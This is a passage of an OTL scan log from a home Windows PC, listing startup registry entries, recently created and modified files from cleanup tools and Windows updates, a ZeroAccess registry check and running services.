O20:64bit: - HKLM Winlogon: UserInit - (C:\windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\windows\SysWow64\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)

O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\windows\SysNative\igfxdev.dll (Intel Corporation)

O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O32 - HKLM CDRom: AutoRun - 1

O34 - HKLM BootExecute: (autocheck autochk *)

O35:64bit: - HKLM\..comfile [open] -- "%1" %*

O35:64bit: - HKLM\..exefile [open] -- "%1" %*

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37:64bit: - HKLM\...com [@ = ComFile] -- "%1" %*

O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*

O37 - HKLM\...com [@ = ComFile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

Drivers32:64bit: msacm.l3acm - C:\Windows\System32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)

Drivers32: msacm.dvacm - c:\Program Files (x86)\Common Files\Ulead Systems\VIO\DVACM.acm (Corel TW Corp.)

Drivers32: msacm.l3acm - C:\Windows\SysWOW64\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS)

Drivers32: msacm.l3codecp - C:\windows\SysWow64\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS)

Drivers32: vidc.cvid - C:\windows\SysWow64\iccvid.dll (Radius Inc.)

========== Files/Folders - Created Within 30 Days ==========

[2014/10/29 08:07:36 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

[2014/10/29 07:44:12 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN

[2014/10/29 07:43:43 | 000,000,000 | ---D | C] -- C:\windows\temp

[2014/10/29 07:08:37 | 000,518,144 | ---- | C] (SteelWerX) -- C:\windows\SWREG.exe

[2014/10/29 07:08:37 | 000,060,416 | ---- | C] (NirSoft) -- C:\windows\NIRCMD.exe

[2014/10/29 07:08:36 | 000,406,528 | ---- | C] (SteelWerX) -- C:\windows\SWSC.exe

[2014/10/29 07:07:30 | 000,000,000 | ---D | C] -- C:\Qoobox

[2014/10/29 07:06:58 | 000,000,000 | ---D | C] -- C:\windows\erdnt

[2014/10/29 07:05:21 | 005,591,672 | R--- | C] (Swearware) -- C:\Users\ADH.Heathman-PC\Desktop\ComboFix.exe

[2014/10/28 22:22:59 | 000,000,000 | ---D | C] -- C:\Users\ADH.Heathman-PC\Desktop\FRST64

[2014/10/28 22:04:22 | 000,000,000 | ---D | C] -- C:\FRST

[2014/10/24 18:49:53 | 000,000,000 | -H-D | C] -- C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}

[2014/10/21 10:22:45 | 000,000,000 | ---D | C] -- C:\Users\ADH.Heathman-PC\AppData\Local\Diagnostics

[2014/10/20 12:22:00 | 006,584,320 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mstscax.dll

[2014/10/20 12:22:00 | 005,703,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mstscax.dll

[2014/10/19 16:51:30 | 000,044,544 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\TsUsbGDCoInstaller.dll

[2014/10/19 16:51:28 | 001,147,392 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mstsc.exe

[2014/10/19 16:51:28 | 001,068,544 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mstsc.exe

[2014/10/19 16:51:28 | 000,420,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wksprt.exe

[2014/10/19 16:51:28 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\TSWbPrxy.exe

[2014/10/19 16:51:28 | 000,062,976 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\tsgqec.dll

[2014/10/19 16:51:28 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\TsUsbFlt.sys

[2014/10/19 16:51:28 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MsRdpWebAccess.dll

[2014/10/19 16:51:28 | 000,053,248 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\tsgqec.dll

[2014/10/19 16:51:28 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\MsRdpWebAccess.dll

[2014/10/19 16:51:28 | 000,018,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wksprtPS.dll

[2014/10/19 16:51:28 | 000,017,920 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wksprtPS.dll

[2014/10/19 16:51:28 | 000,013,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\TsUsbRedirectionGroupPolicyControl.exe

[2014/10/19 16:51:28 | 000,012,800 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\TsUsbRedirectionGroupPolicyExtension.dll

[2014/10/19 16:51:27 | 001,057,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rdvidcrl.dll

[2014/10/19 16:51:27 | 000,855,552 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\rdvidcrl.dll

[2014/10/19 16:19:54 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Symantec Shared

[2014/10/19 16:00:47 | 000,177,752 | ---- | C] (Symantec Corporation) -- C:\windows\SysNative\drivers\SYMEVENT64x86.SYS

[2014/10/19 16:00:20 | 000,000,000 | R--D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton 360

[2014/10/19 16:00:19 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Norton 360

[2014/10/19 15:49:00 | 000,519,680 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\qdvd.dll

[2014/10/19 15:49:00 | 000,371,712 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\qdvd.dll

[2014/10/19 15:48:57 | 001,131,664 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\dfshim.dll

[2014/10/19 15:48:57 | 000,156,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mscorier.dll

[2014/10/19 15:48:57 | 000,156,312 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mscorier.dll

[2014/10/19 15:48:56 | 001,943,696 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dfshim.dll

[2014/10/19 15:48:56 | 000,081,560 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mscories.dll

[2014/10/19 15:48:56 | 000,073,880 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mscories.dll

[2014/10/19 15:48:50 | 000,007,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\KBDYAK.DLL

[2014/10/19 15:48:50 | 000,007,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\KBDTAT.DLL

[2014/10/19 15:48:50 | 000,007,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\KBDTAT.DLL

[2014/10/19 15:48:50 | 000,007,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\KBDRU1.DLL

[2014/10/19 15:48:50 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\KBDRU1.DLL

[2014/10/19 15:48:50 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\KBDRU.DLL

[2014/10/19 15:48:50 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\KBDRU.DLL

[2014/10/19 15:48:50 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\KBDBASH.DLL

[2014/10/19 15:48:49 | 000,007,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\KBDYAK.DLL

[2014/10/19 15:48:49 | 000,007,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\KBDBASH.DLL

[2014/10/19 15:48:47 | 000,507,392 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aepdu.dll

[2014/10/19 15:48:47 | 000,276,480 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\generaltel.dll

[2014/10/19 15:48:46 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aeinv.dll

[2014/10/19 15:48:40 | 003,241,472 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msi.dll

[2014/10/19 15:48:29 | 003,179,520 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rdpcorets.dll

[2014/10/19 15:48:25 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rastls.dll

[2014/10/19 15:48:25 | 000,372,736 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\rastls.dll

[2014/10/19 15:48:13 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winlogon.exe

[2014/10/19 15:48:13 | 000,235,520 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winsta.dll

[2014/10/19 15:48:13 | 000,150,528 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rdpcorekmts.dll

[2014/10/19 15:45:57 | 000,077,312 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\packager.dll

[2014/10/19 15:45:57 | 000,067,072 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\packager.dll

[2014/10/19 15:45:50 | 000,603,136 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msfeeds.dll

[2014/10/19 15:45:49 | 003,959,296 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\jscript9.dll

[2014/10/19 15:45:49 | 001,508,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\inetcpl.cpl

[2014/10/19 15:45:49 | 001,440,768 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\inetcpl.cpl

[2014/10/19 15:45:49 | 000,526,336 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ieui.dll

[2014/10/19 15:45:49 | 000,391,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ieui.dll

[2014/10/19 15:45:49 | 000,281,600 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dxtrans.dll

[2014/10/19 15:45:49 | 000,136,704 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\iesysprep.dll

[2014/10/19 15:45:49 | 000,109,056 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\iesysprep.dll

[2014/10/19 15:45:49 | 000,097,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mshtmled.dll

[2014/10/19 15:45:49 | 000,080,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mshtmled.dll

[2014/10/19 15:45:48 | 000,855,552 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\jscript.dll

[2014/10/19 15:45:48 | 000,690,688 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\jscript.dll

[2014/10/19 15:45:47 | 000,451,584 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dxtmsft.dll

[2014/10/19 15:45:47 | 000,197,120 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msrating.dll

[2014/10/19 15:45:47 | 000,163,840 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\msrating.dll

[2014/10/19 15:45:47 | 000,051,712 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ie4uinit.exe

[2014/10/19 15:45:46 | 000,039,936 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\iernonce.dll

[2014/10/19 15:45:46 | 000,033,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\iernonce.dll

[2014/10/19 15:45:45 | 000,067,072 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\iesetup.dll

[2014/10/19 15:45:45 | 000,061,440 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\iesetup.dll

[2014/10/19 15:45:44 | 000,089,600 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\RegisterIEPKEYs.exe

[2014/10/19 15:45:44 | 000,071,680 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\RegisterIEPKEYs.exe

[1 C:\windows\SysWow64\*.tmp files -> C:\windows\SysWow64\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2014/10/29 08:08:46 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\windows\SysNative\drivers\MBAMSwissArmy.sys

[2014/10/29 08:05:00 | 000,000,898 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineUA.job

[2014/10/29 08:04:02 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ADH.Heathman-PC\Desktop\OTL.exe

[2014/10/29 07:24:12 | 000,000,027 | ---- | M] () -- C:\windows\SysNative\drivers\etc\hosts

[2014/10/29 07:24:00 | 000,000,830 | ---- | M] () -- C:\windows\tasks\Adobe Flash Player Updater.job

[2014/10/29 07:23:00 | 000,000,920 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job

[2014/10/29 07:06:46 | 005,591,672 | R--- | M] (Swearware) -- C:\Users\ADH.Heathman-PC\Desktop\ComboFix.exe

[2014/10/29 06:23:00 | 000,000,868 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job

[2014/10/29 06:15:04 | 000,067,584 | --S- | M] () -- C:\windows\bootstat.dat

[2014/10/28 22:03:40 | 000,914,774 | ---- | M] () -- C:\windows\SysNative\perfh009.dat

[2014/10/28 22:03:40 | 000,210,114 | ---- | M] () -- C:\windows\SysNative\perfc009.dat

[2014/10/28 22:03:40 | 000,006,214 | ---- | M] () -- C:\windows\SysNative\PerfStringBackup.INI

[2014/10/28 21:12:20 | 000,025,120 | -H-- | M] () -- C:\windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2014/10/28 21:12:20 | 000,025,120 | -H-- | M] () -- C:\windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2014/10/28 21:04:43 | 2074,099,711 | -HS- | M] () -- C:\hiberfil.sys

[2014/10/25 14:00:07 | 000,000,894 | ---- | M] () -- C:\windows\tasks\GoogleUpdateTaskMachineCore.job

[2014/10/20 19:34:11 | 000,001,113 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk

[2014/10/20 12:21:44 | 002,409,610 | ---- | M] () -- C:\windows\SysNative\drivers\N360x64\1506000.020\Cat.DB

[2014/10/19 16:58:10 | 000,434,912 | ---- | M] () -- C:\windows\SysNative\FNTCACHE.DAT

[2014/10/19 16:00:47 | 000,177,752 | ---- | M] (Symantec Corporation) -- C:\windows\SysNative\drivers\SYMEVENT64x86.SYS

[2014/10/19 16:00:47 | 000,008,222 | ---- | M] () -- C:\windows\SysNative\drivers\SYMEVENT64x86.CAT

[2014/10/19 16:00:47 | 000,000,854 | ---- | M] () -- C:\windows\SysNative\drivers\SYMEVENT64x86.INF

[2014/10/19 16:00:46 | 000,002,402 | ---- | M] () -- C:\Users\Public\Desktop\Norton 360.lnk

[2014/10/19 15:39:36 | 000,002,030 | ---- | M] () -- C:\Users\Public\Desktop\Adobe Reader X.lnk

[2014/10/14 11:44:28 | 000,048,844 | ---- | M] () -- C:\windows\SysNative\drivers\N360x64\1506000.020\VT20141014.006

[2014/10/09 21:05:59 | 000,276,480 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\generaltel.dll

[2014/10/09 21:05:42 | 000,507,392 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\aepdu.dll

[2014/10/09 21:00:38 | 000,424,448 | ---- | M] (Microsoft Corporation) -- C:\windows\SysNative\aeinv.dll

[2014/10/01 11:11:26 | 000,063,704 | ---- | M] (Malwarebytes Corporation) -- C:\windows\SysNative\drivers\mwac.sys

[2014/10/01 11:11:16 | 000,093,400 | ---- | M] (Malwarebytes Corporation) -- C:\windows\SysNative\drivers\mbamchameleon.sys

[2014/10/01 11:11:12 | 000,025,816 | ---- | M] (Malwarebytes Corporation) -- C:\windows\SysNative\drivers\mbam.sys

[2014/10/01 06:44:55 | 002,330,924 | ---- | M] () -- C:\windows\SysNative\drivers\N360x64\1505000.013\Cat.DB

[2014/10/01 04:12:00 | 000,045,746 | ---- | M] () -- C:\windows\SysNative\drivers\N360x64\1505000.013\VT20141001.003

[1 C:\windows\SysWow64\*.tmp files -> C:\windows\SysWow64\*.tmp -> ]

========== Files Created - No Company Name ==========

[2014/10/29 07:08:37 | 000,256,000 | ---- | C] () -- C:\windows\PEV.exe

[2014/10/29 07:08:37 | 000,208,896 | ---- | C] () -- C:\windows\MBR.exe

[2014/10/29 07:08:37 | 000,068,096 | ---- | C] () -- C:\windows\zip.exe

[2014/10/29 07:08:36 | 000,098,816 | ---- | C] () -- C:\windows\sed.exe

[2014/10/29 07:08:36 | 000,080,412 | ---- | C] () -- C:\windows\grep.exe

[2014/10/19 17:07:36 | 000,156,452 | ---- | C] () -- C:\Users\Public\Documents\revised estimate.pdf

[2014/10/19 16:00:47 | 000,008,222 | ---- | C] () -- C:\windows\SysNative\drivers\SYMEVENT64x86.CAT

[2014/10/19 16:00:47 | 000,000,854 | ---- | C] () -- C:\windows\SysNative\drivers\SYMEVENT64x86.INF

[2014/10/19 16:00:46 | 000,002,402 | ---- | C] () -- C:\Users\Public\Desktop\Norton 360.lnk

[2012/03/26 19:10:42 | 000,000,935 | ---- | C] () -- C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

[2012/03/25 18:13:27 | 000,000,952 | -HS- | C] () -- C:\ProgramData\KGyGaAvL.sys

========== ZeroAccess Check ==========

[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 21:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 20:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64

"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 22:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64

"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2014/05/29 18:08:07 | 000,000,000 | ---D | M] -- C:\Users\ADH.Heathman-PC\AppData\Roaming\0870

[2013/12/18 07:38:10 | 000,000,000 | ---D | M] -- C:\Users\ADH.Heathman-PC\AppData\Roaming\Motorola Mobility

[2014/05/25 08:36:12 | 000,000,000 | ---D | M] -- C:\Users\ADH.Heathman-PC\AppData\Roaming\sMedio

[2013/12/18 07:42:12 | 000,000,000 | ---D | M] -- C:\Users\ADH.Heathman-PC\AppData\Roaming\Toshiba

[2012/12/06 21:37:00 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Amazon

[2012/04/07 15:57:11 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\BloodTies

[2012/06/27 22:02:37 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Book Place

[2014/05/10 20:41:03 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\GameMill Entertainment

[2012/11/21 13:00:14 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Hoyle Blackjack

[2012/11/25 20:23:33 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Hoyle Card Games

[2012/04/07 14:44:47 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Hoyle Casino

[2012/04/07 14:44:12 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Hoyle FaceCreator

[2014/10/28 22:39:07 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\MotoCast

[2012/10/13 15:29:56 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Motorola

[2012/10/13 15:30:48 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Motorola Mobility

[2012/06/27 17:33:09 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\PCCUStubInstaller

[2012/12/14 18:00:14 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\PopCapv1000

[2012/11/23 20:26:42 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\PopCapv1002

[2012/10/13 15:36:46 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\sMedio

[2012/04/01 20:35:00 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Spearit

[2012/12/14 17:57:42 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\SpinTop Games

[2012/04/01 17:05:39 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Tific

[2012/06/27 20:07:11 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\TomTom

[2013/01/22 07:58:04 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Toshiba

[2012/03/25 18:14:24 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Ulead Systems

[2012/03/24 12:44:27 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\WinBatch

[2012/03/25 19:55:36 | 000,000,000 | ---D | M] -- C:\Users\Heathman\AppData\Roaming\Windows Live Writer

========== Purity Check ==========

========== Custom Scans ==========

========== Base Services ==========

SRV:64bit: - [2009/07/13 20:40:01 | 000,072,192 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)

SRV:64bit: - [2013/02/27 00:47:10 | 000,070,144 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)

SRV:64bit: - [2009/07/13 20:38:55 | 000,079,360 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)

SRV:64bit: - [2010/11/20 22:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\qmgr.dll -- (BITS)

SRV:64bit: - [2010/11/20 22:24:00 | 000,705,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\BFE.DLL -- (BFE)

SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\lsass.exe -- (KeyIso)

SRV:64bit: - [2009/07/13 20:40:50 | 000,402,944 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\es.dll -- (EventSystem)

SRV - [2009/07/13 20:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)

SRV:64bit: - [2012/07/04 17:13:27 | 000,136,704 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\browser.dll -- (Browser)

SRV:64bit: - [2013/07/09 00:46:20 | 000,184,320 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)

SRV - [2013/07/08 23:46:31 | 000,140,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\cryptsvc.dll -- (CryptSvc)

SRV:64bit: - [2010/11/20 22:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)

SRV:64bit: - [2010/11/20 22:24:00 | 000,317,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)

SRV - [2010/11/20 22:24:09 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)

SRV:64bit: - [2011/03/03 01:24:16 | 000,183,296 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)

SRV:64bit: - [2009/07/13 20:40:35 | 000,111,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\eapsvc.dll -- (EapHost)

SRV:64bit: - [2009/07/13 20:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)

SRV - [2009/07/13 20:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)

SRV:64bit: - [2009/07/13 20:41:10 | 000,359,424 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)

SRV:64bit: - [2010/11/20 22:23:48 | 000,501,248 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)

No service found with a name of MsMpSvc

No service found with a name of NisSrv

SRV:64bit: - [2009/07/13 20:41:54 | 000,524,288 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)

SRV:64bit: - [2009/07/13 20:41:26 | 000,067,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)

SRV:64bit: - [2009/07/13 20:41:52 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netman.dll -- (Netman)

SRV:64bit: - [2009/07/13 20:41:52 | 000,459,776 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofm.dll -- (netprofm)

SRV - [2009/07/13 20:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysWOW64\netprofm.dll -- (netprofm)

SRV:64bit: - [2012/10/03 12:44:21 | 000,303,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)

SRV:64bit: - [2009/07/13 20:41:53 | 000,025,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)

SRV:64bit: - [2011/05/24 06:42:55 | 000,404,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)

SRV:64bit: - [2012/02/11 01:36:02 | 000,559,104 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)

SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\lsass.exe -- (ProtectedStorage)

No service found with a name of EMDMgmt

SRV:64bit: - [2009/07/13 20:41:53 | 000,099,328 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)

